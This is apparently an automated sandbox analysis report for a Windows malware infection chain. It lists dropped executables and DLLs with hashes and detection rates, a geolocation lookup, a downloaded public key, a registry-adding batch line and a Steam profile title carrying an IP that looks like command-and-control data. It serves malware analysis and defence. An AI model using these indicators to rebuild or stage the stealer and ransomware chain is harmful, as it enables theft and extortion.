                                                                                                                                                                                                                                      SHA-512:CD560ABBC222932459668DB503CC7072FF301EB3CB8BB60F4665B7142DD90BFD2083CFA9FC1198F0EF2AB43C2BC1F33ED6BBB36EC9CC2097BFD3648059038388
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: fgsh https://78.46.229.36|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build2[1].exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):283648
                                                                                                                                                                                                                                      Entropy (8bit):6.560408763549925
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:GtcSsUDC2OZuhYRQqPY3x/OKV/LYZsTZgzENh+a1:TSsUO2cuhY1m/VYZsI
                                                                                                                                                                                                                                      MD5:8DAE8B6A6BE6E3527183594D1C26A2D3
                                                                                                                                                                                                                                      SHA1:B87E40CEE60869A36E79C88C8A3A34BAF0BC4889
                                                                                                                                                                                                                                      SHA-256:AFCE72CD3BC717C784962083066E3EDE2B0AAADBE0908EC7360096C923774FA5
                                                                                                                                                                                                                                      SHA-512:0BF065700DB647EFBA39A13A58242A595907E6C11885575CF0BDAD9E23AB40583C8A6535464E46D75D075E20D88B7A6305A761DF9DA787FDC8728483DD48F96E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..\#.[\#.[\#.[3U.[D#.[3U [(#.[3U![{#.[U[.[W#.[\#.[7#.[3U%[]#.[3U.[]#.[3U.[]#.[Rich\#.[........................PE..L.....c..........................................@.................................'........................................\..x....................................................................S..@............................................text............................... ..`.rdata...U.......V..................@..@.data....B...p...,...N..............@....rsrc................z..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\build3[1].exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):306688
                                                                                                                                                                                                                                      Entropy (8bit):6.7250330334577075
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
                                                                                                                                                                                                                                      MD5:41B883A061C95E9B9CB17D4CA50DE770
                                                                                                                                                                                                                                      SHA1:1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
                                                                                                                                                                                                                                      SHA-256:FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
                                                                                                                                                                                                                                      SHA-512:CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\geo[1].json

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):521
                                                                                                                                                                                                                                      Entropy (8bit):4.543868344565204
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:YZ8GXwpHEx6uAsBzdI/p3dI/pa39+I/pOI/p3m7c2JSQ:YhKHDZsvIjIG+IgIZm42cQ
                                                                                                                                                                                                                                      MD5:66803E7C5B17F15D7FE42BADF987BBB3
                                                                                                                                                                                                                                      SHA1:A9DB89800326D7609984587313F2CB882230C23A
                                                                                                                                                                                                                                      SHA-256:181B45D26C23AD7AD79EDA106090F2BA717107326437A47B566B4F42A1947F8F
                                                                                                                                                                                                                                      SHA-512:0760AAEFC48A3B5273D771FCAE22C8F8D0905FB4C2E4EF8AA8CC40F698DFAE8C07C53495D21FEE6663D76EDEF547E29BEA83DAF213C1465FFBEC4B858382C8CF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:{"ip":"102.165.48.43","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","region_ua":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","city":"Washington","city_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","city_ua":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d","latitude":"38.89539","longitude":"-77.039476"}

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\get[1].htm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):558
                                                                                                                                                                                                                                      Entropy (8bit):5.9641189283105875
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:YGJ68UNbNL0zG/dDnzGPCRGhvVUppYZj50/ixpZr:YgJUNb5XDHgq/iTl
                                                                                                                                                                                                                                      MD5:F045B26CB70DB6CCC8DB1535B182BF4E
                                                                                                                                                                                                                                      SHA1:A67A8EDFA7974502DC9037F1A0550582EB86C907
                                                                                                                                                                                                                                      SHA-256:06B9FE6981432C1B5E056AA233EF61AC101215043F338A4F065A8FD9ED0C3C85
                                                                                                                                                                                                                                      SHA-512:35A4BFC0970A01D820A0FDE5E85AFCF618AD27A9BA63B3BB31D9142FA793EA33A5C291D3495157DFB67EB31DD1659359B514C77EBA6DB240EC85B34113A82971
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:{"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzzVYb8CErbW\/pFkhLDyb\\n9IMnMjZ6LXzFZ8VEK4FVwrKK37fmeqilqo43fmLPIG+zg6ATp\/1+RCjWyBlcmgRf\\nQVbxQd5kgkJM\/qvDuoZiSU6bEtO2Gul62Y3rVW2Ry4f8yWTC80E15UtxD5x1RU10\\nOhjVMu2+nzvF4BBiTGN4wOR+KEbmXJMx8GbyX8rKpSVM4AthODhf1O7xO8LDE3A2\\nLVb+fgXtlp+KU7InK\/ykqgYGQJ7ot1T2xhbuiI2CypYEjUWj6ryIMBtYTR27kn1G\\nnslb1JL7NiXoCSEhbYxUqUv0hVuG1eZ7WqqGumf7CKjMJXZnLoyNBfWoli2qxuRX\\nfwIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5"}

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):685392
                                                                                                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):608080
                                                                                                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):450024
                                                                                                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2224
                                                                                                                                                                                                                                      Entropy (8bit):5.354902188542171
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:CWSU4y4RQmFoUeWmfgZ9tK8NPdMs7u1iMugeC/ZaOUyu0lhV:CLHyIFKL3IZ2KlDOugg01
                                                                                                                                                                                                                                      MD5:F0A2951B4A2707FEA41442FACB995C9C
                                                                                                                                                                                                                                      SHA1:66F38C4D57B51434D429FF5ADCABD1901693522F
                                                                                                                                                                                                                                      SHA-256:29441A7E0E9FDFF83A18CD40A5ACF593A639D9523E0213FBD7792452ECC2AB04
                                                                                                                                                                                                                                      SHA-512:9E053A7200ADB17739B24FADD2165D119D50905DBFE05F931F6AF289B1954891137D3DB2496F42D74C601A1FD5E8588005B11267EBF8144C0209810D0E7F8B45
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:@...e...........................................................P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\5F8F.bat

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):77
                                                                                                                                                                                                                                      Entropy (8bit):4.90323175550411
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:u3Pvrmwqp2YR3sGJMGP5Rg5XQiKyMhF7n:uPzmg83JMuBi67
                                                                                                                                                                                                                                      MD5:55CC761BF3429324E5A0095CAB002113
                                                                                                                                                                                                                                      SHA1:2CC1EF4542A4E92D4158AB3978425D517FAFD16D
                                                                                                                                                                                                                                      SHA-256:D6CCEB3C71B80403364BF142F2FA4624EE0BE36A49BAC25ED45A497CF1CE9C3A
                                                                                                                                                                                                                                      SHA-512:33F9F5CAD22D291077787C7DF510806E4AC31F453D288712595AF6DEBE579FABED6CDF4662E46E6FA94DE135B161E739F55CFAE05C36C87AF85ED6A6AD1C9155
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\71C9.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):4344720
                                                                                                                                                                                                                                      Entropy (8bit):7.96212137259113
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:98304:+GTNMYDj3iBHNoHffgF5PrwWJSfEGn3jJ6VZDlAo879KWP5CvHY3:5Ty87i5G/fgF5bJSfbTJQAn95xCfY
                                                                                                                                                                                                                                      MD5:9857733C11948AC79AA5362444C01E94
                                                                                                                                                                                                                                      SHA1:08BF2598FDBA00BB006664F98AF69C2A49379C74
                                                                                                                                                                                                                                      SHA-256:1F594C9EA093853986ED34540370968FE3C49367A9D76B09E45656E8337759DF
                                                                                                                                                                                                                                      SHA-512:AA9BBA22CDE4E9C0FB8EAA317AB919A741E16133EC49E41FAE96D9D8F74C874806CFBE4783A5D43E3CEE0D1F50703E607C1FA51FDEEC24E3E0266E7217F2B4DE
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...Q.yd...........................'?............@................................#+C......................................a..P....P...y...........@B.................8............................V..@............................................text...`........................... ..`.rdata..Bj.......l..................@..@.data... ...p...p@..V..............@....rsrc....y...P...z....A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\7F9A.bat

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):77
                                                                                                                                                                                                                                      Entropy (8bit):4.90323175550411
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:u3Pvrmwqp2YR3sGJMGP5Rg5XQiKyMhF7n:uPzmg83JMuBi67
                                                                                                                                                                                                                                      MD5:55CC761BF3429324E5A0095CAB002113
                                                                                                                                                                                                                                      SHA1:2CC1EF4542A4E92D4158AB3978425D517FAFD16D
                                                                                                                                                                                                                                      SHA-256:D6CCEB3C71B80403364BF142F2FA4624EE0BE36A49BAC25ED45A497CF1CE9C3A
                                                                                                                                                                                                                                      SHA-512:33F9F5CAD22D291077787C7DF510806E4AC31F453D288712595AF6DEBE579FABED6CDF4662E46E6FA94DE135B161E739F55CFAE05C36C87AF85ED6A6AD1C9155
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\A0B.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):6824024
                                                                                                                                                                                                                                      Entropy (8bit):7.972206333236493
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:196608:IzDAdubIHCIWMzkHJAYR7rn7/A29DNd4TWf/f+mnK:IzMd2mCIVzkHHf029DwWXfbK
                                                                                                                                                                                                                                      MD5:9E52AA572F0AFC888C098DB4C0F687FF
                                                                                                                                                                                                                                      SHA1:EF7C2BB222E69AD0E10C8686EB03DCBEE7933C2B
                                                                                                                                                                                                                                      SHA-256:4A40F9D491F09521F4B0C6076A0EB488F6D8E1CF4B67AA6569C2CCCE13556443
                                                                                                                                                                                                                                      SHA-512:D0991E682AE8C954721E905753B56C01F91B85313BEB9996331793C3EFA8ACC13D574EF5BA44853ECC3E05822931ED655BAD1924FA11B774A43E015F42185F62
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...i:.e.................P.......................@..........................P........h...@.........................................@..(.............h.X.... ..$....................................................0f..............................text...+O.......................... ..`.rdata...)...`......................@..@.data...8...........................@....vmp..)Y4..0......................`..`.vmp........8.....................`..`.vmp.{.Kp....V..................... ..`.vmp.{.$....0f.....................@....vmp.{...c..@f...c................. ..`.reloc..$.... ........c.............@..@.rsrc...(....@........c.............@..@........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\DB15.exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):776192
                                                                                                                                                                                                                                      Entropy (8bit):7.532138857063051
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:JELneMTYXRD+8PgS7Xbus0kn6F0y5oIpD/8hOmzytYYQte:JqiRy8P97X+kxwoIN0hJytYdt
                                                                                                                                                                                                                                      MD5:34BE2CA8394CF2DBD6AA006472864E97
